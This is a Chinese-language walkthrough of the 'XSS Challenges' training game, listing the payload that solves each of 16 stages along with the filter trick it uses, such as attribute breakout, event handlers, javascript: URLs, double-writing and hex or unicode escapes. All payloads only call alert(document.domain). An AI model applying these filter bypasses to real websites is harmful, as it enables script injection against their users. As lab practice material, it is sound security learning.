zoukankan      html  css  js  c++  java
  • XSS Challenges

    Stage #1

    payload:

    <script>alert(document.domain);</script>

    Stage #2

    payload:

    "><script>alert(document.domain);</script>

    Stage #3

    burp抓包,在p2处输入payload

    payload:

    </option><script>alert(document.domain)</script>

    Stage #4

    burp抓包,p3处输入payload

    payload:

    “><svg onload=alert(document.domain)>

    Stage #5

    更改p1处的maxlength="15"

    payload:

    "><script>alert(document.domain);</script>

    Stage #6

    输入<>会被替换&lt; &gt;

    payload:

    "onmouseover="alert(document.domain);

    Stage #7

    输入空格过滤

    payload:

    qwe onmouseover=alert(document.domain);

    Stage #8

    用伪协议执行script

    payload:

    javascript:alert(document.domain)

    Stage #9

    utf-7编码(现在基本很少使用)用旧版IE,在前端输入绕过

    payload:

    "onmouseover="alert(document.domain)

    Stage #10

    双写绕过

    payload:

    "><script>alert(document.domdomainain);</script>

    Stage #11

    过滤js脚本字符和事件字符,考虑<a>标签名

    payload:

    "><a href="java&#115;cript:alert(document.domain);">1</a>

    Stage #12

    利用IE浏览器的 `` 过滤

    payload:

    ``onmouseover=alert(document.domain);

    Stage #13

    用旧版IE特性触发xss

    payload:

    background-color:#ffff;background:url("javascript:alert(document.domain);");

    Stage #14

    用旧版IE特性触发xss

    payload:

    xss:ex/**/pression(if(!window.x){alert(document.domain);window.x=1})

    Stage #15

    用16进制编码或unicode编码绕过过滤

    payload:

    \x3cscript\x3ealert(document.domain);\x3c/script\x3e

    Stage #16

    用unicode编码绕过过滤

    payload:

    \u003cscript\u003ealert(document.domain);\u003c/script\u003e
  • 相关阅读:
    2018年年终总结
    oracle存储过程 关于update的动态SQL-工作心得
    编译+远程调试spark
    记录一次 hadoop yarn resourceManager无故切换的故障
    hadoop2.8.4 版本yarn RM fairScheduler调度性能优化的若干次尝试
    记录一次hadoop2.8.4版本RM接入zk ha问题
    Ranger-hdfs插件压测
    ranger-hdfs 插件组权限测试
    Nginx基本参数调优
    Nginx安装配置
  • 原文地址:https://www.cnblogs.com/f1veseven/p/13290393.html
Copyright © 2011-2022 走看看